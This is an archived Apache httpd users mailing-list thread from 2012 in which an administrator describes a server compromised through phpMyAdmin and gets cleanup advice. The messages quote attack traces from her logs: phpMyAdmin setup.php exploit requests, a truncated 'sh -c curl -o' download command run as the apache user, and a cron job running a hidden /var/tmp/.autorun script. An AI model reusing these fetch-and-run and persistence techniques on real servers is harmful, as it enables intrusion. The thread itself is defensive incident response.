Re: [users@httpd] attack on apache - solved -

2012-01-16 Thread Simone Caruso
> > xx.xxx.xx.xx "GET /admin/phpmyadmin/scripts/setup.php HTTP/1.1" 200 14049 "-" > "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]" > xx.xxx.xxx.xx "POST /admin/phpmyadmin/scripts/setup.php HTTP/1.1" 200 - > "http://xxx.xx.xx.xx/admin/phpmyadmin/scripts/setup.php\r"

RE: [users@httpd] attack on apache - solved -

2012-01-13 Thread Luisa Ester Navarro
> Date: Fri, 13 Jan 2012 15:32:55 -0500 > To: users@httpd.apache.org > From: storm...@stormy.ca > Subject: Re: [users@httpd] attack on apache - solved - > > At 04:48 PM 1/13/2012 -0300, you wrote: > >Thanks a lot to everyone who help me to solve the problem. >

Re: [users@httpd] attack on apache - solved -

2012-01-13 Thread Stormy
At 04:48 PM 1/13/2012 -0300, you wrote: Thanks a lot to everyone who help me to solve the problem. I had installed phpmyadmin and they used it to attack my server. I found this in /var/log/httpd/access_log Was your compile of apache2 "prefork" or "worker"? And could you be a little more expli

Re: [users@httpd] attack on apache - solved -

2012-01-13 Thread congo thomas
On Fri, January 13, 2012 20:48, Luisa Ester Navarro wrote: > > Thanks a lot to everyone who help me to solve the problem. > I had installed phpmyadmin and they used it to attack my server. > I found this in /var/log/httpd/access_log So which measures did you take into account to fix the problem? -

[users@httpd] attack on apache - solved -

2012-01-13 Thread Luisa Ester Navarro
Thanks a lot to everyone who help me to solve the problem. I had installed phpmyadmin and they used it to attack my server. I found this in /var/log/httpd/access_log Cheers Luisa

Re: [users@httpd] attack on apache

2012-01-11 Thread Jaco Kroon
Hi, On 12/01/12 00:14, Jeroen Geilman wrote: On 01/11/2012 10:10 PM, Jaco Kroon wrote: On 11/01/12 22:37, Luisa Ester Navarro wrote: J. Thanks Jeron: any idea how to start researching which is the leaky scr

Re: [users@httpd] attack on apache

2012-01-11 Thread Jeroen Geilman
On 01/11/2012 10:10 PM, Jaco Kroon wrote: On 11/01/12 22:37, Luisa Ester Navarro wrote: J. Thanks Jeron: any idea how to start researching which is the leaky script Cheers Luisa Hehe, this is where they say,

Re: [users@httpd] attack on apache

2012-01-11 Thread Jaco Kroon
On 11/01/12 22:37, Luisa Ester Navarro wrote: J. Thanks Jeron: any idea how to start researching which is the leaky script Cheers Luisa Hehe, this is where they say, RTFS, or as Jeron suggested, see if you ca

Re: [users@httpd] attack on apache

2012-01-11 Thread Kevin A. McGrail
any idea how to start researching which is the leaky script Checking the access log for the same ip that was getting the errors you found in the error_log is a good start. - The official User-To-User support foru

RE: [users@httpd] attack on apache

2012-01-11 Thread Luisa Ester Navarro
Date: Wed, 11 Jan 2012 21:13:53 +0100 From: jer...@adaptr.nl To: users@httpd.apache.org Subject: Re: [users@httpd] attack on apache On 01/11/2012 09:10 PM, Jaco Kroon wrote: On 11/01/12 21:35, Jeroen Geilman wrote

Re: [users@httpd] attack on apache

2012-01-11 Thread Jeroen Geilman
On 01/11/2012 09:10 PM, Jaco Kroon wrote: On 11/01/12 21:35, Jeroen Geilman wrote: In /var/log/httpd/error_log I see hink like this sh: del comand no found sh: xx Permission denied I need help ! 1. Stop apache. 2. investigate which leaky, creaky or lousy PHP script allowed this exploit.

Re: [users@httpd] attack on apache

2012-01-11 Thread Jaco Kroon
On 11/01/12 21:35, Jeroen Geilman wrote: In /var/log/httpd/error_log I see hink like this sh: del comand no found sh: xx Permission denied I need help ! 1. Stop apache. 2. investigate which leaky, creaky or lousy PHP script allowed this exploit. 3. remove the bad script. 4. Remount /tmp

Re: [users@httpd] attack on apache

2012-01-11 Thread Jeroen Geilman
On 01/11/2012 08:24 PM, Luisa Ester Navarro wrote: From: luisa2...@hotmail.com To: users@httpd.apache.org Subject: RE: [users@httpd] attack on apache Date: Wed, 11 Jan 2012 16:15:14 -0300 > Date: Mon, 9 Jan 2012 17

RE: [users@httpd] attack on apache

2012-01-11 Thread Luisa Ester Navarro
From: luisa2...@hotmail.com To: users@httpd.apache.org Subject: RE: [users@httpd] attack on apache Date: Wed, 11 Jan 2012 16:15:14 -0300 > Date: Mon, 9 Jan 2012 17:30:21 + > From: tevans...@googlemail.com > To: users@httpd.apache.org > Subject: Re: FW: [users@http

Re: FW: [users@httpd] attack on apache

2012-01-09 Thread Tom Evans
On Mon, Jan 9, 2012 at 5:20 PM, Luisa Ester Navarro wrote: > > > > > I didn´t have any cronjobs but when I detected the attack I saw one  in > /var/spool/cron >  My logifle says > User apache: > >    /var/tmp/.autorun/update >/dev/null 2>&1: 2162 Time(s) > >   

FW: [users@httpd] attack on apache

2012-01-09 Thread Luisa Ester Navarro
al crontab replaced: 1 Time(s)Thanks > Date: Mon, 9 Jan 2012 18:05:38 +0100 > From: i...@simonecaruso.com > To: users@httpd.apache.org > CC: luisa2...@hotmail.com > Subject: Re: [users@httpd] attack on apache > > On 09/01/2012 16:11, Luisa Ester Navarro wrote: > > My se

Re: [users@httpd] attack on apache

2012-01-09 Thread Simone Caruso
On 09/01/2012 16:11, Luisa Ester Navarro wrote: > My server is being attacked. I think it is from apache because I have found > commands running with the owner apache. > My httpd is on /usr/sbin and they run on /usr/local/apache/bin/httpd -DSFSL > and sh -c curl -o http > I don't think the

[users@httpd] attack on apache

2012-01-09 Thread Luisa Ester Navarro
My server is being attacked. I think it is from apache because I have found commands running with the owner apache. My httpd is on /usr/sbin and they run on /usr/local/apache/bin/httpd -DSFSL and sh -c curl -o http They also run every minutes a crontab from /var/spool/cron and I din´t ha